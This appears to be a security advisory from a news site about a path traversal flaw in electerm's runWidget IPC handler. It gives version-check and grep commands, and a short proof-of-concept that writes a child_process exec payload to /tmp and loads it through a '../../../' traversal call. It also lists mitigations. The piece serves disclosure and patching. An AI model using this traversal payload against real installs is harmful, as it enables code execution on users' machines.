Listen to this Post
The vulnerability resides in the `runWidget` function defined in src/app/widgets/load-widget.js. This function constructs a file path by directly concatenating a user-supplied `widgetId` into a string: const file =widget-${widgetId}.js“. No sanitization or validation is performed on widgetId. The function then uses `require(path.join(__dirname, file))` to load the resulting JavaScript file. The `runWidget` function is exposed to the renderer process through an asynchronous IPC handler. Because the renderer process can be compromised (e.g., via a malicious plugin or an XSS flaw in the built-in webview), an attacker can invoke this IPC handler with a crafted `widgetId` containing path traversal sequences such as ../. This allows the attacker to escape the intended widget directory and load any arbitrary `.js` file from the victim’s filesystem. Since the loaded code is executed with the full privileges of the electerm process, the attacker achieves local code execution, potentially leading to complete system compromise. No input validation or sandboxing is applied at the IPC boundary. The issue is fixed in electerm version 3.7.16 and later.
Platform: electerm
Version: <3.7.16
Vulnerability: Path Traversal
Severity: Medium
date: 2024-04-15 (estimated disclosure)
Prediction: Already patched (v3.7.16)
What Undercode Say:
Analytics:
Identify vulnerable versions
npm list electerm | grep -E "electerm@[0-2]|electerm@3.[0-6]."
Check for insecure IPC exposure
grep -r "ipcMain.handle('runWidget'" src/
Simulate path traversal payload
echo 'require("child_process").exec("calc")' > /tmp/evil.js
Trigger via renderer (conceptual)
ipcRenderer.invoke('runWidget', '../../../tmp/evil')
Exploit:
// Attacker-controlled renderer code (e.g., via malicious plugin)
const { ipcRenderer } = require('electron');
// Path traversal to load arbitrary JS
ipcRenderer.invoke('runWidget', '../../../users/attacker/payload').catch(console.log);
// Payload file (e.g., /users/attacker/payload.js) contains malicious code
Protection from this CVE:
- Upgrade to electerm >= 3.7.16 immediately.
- If upgrade impossible, avoid running untrusted plugins or loading remote web content.
- Run electerm under sandboxing (bubblewrap on Linux, AppArmor, or Windows Sandbox).
- Monitor for suspicious IPC calls using process monitoring tools.
Impact:
Complete local code execution with electerm’s privileges; attacker can read/write files, install backdoors, pivot to internal network, or compromise the host system entirely.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
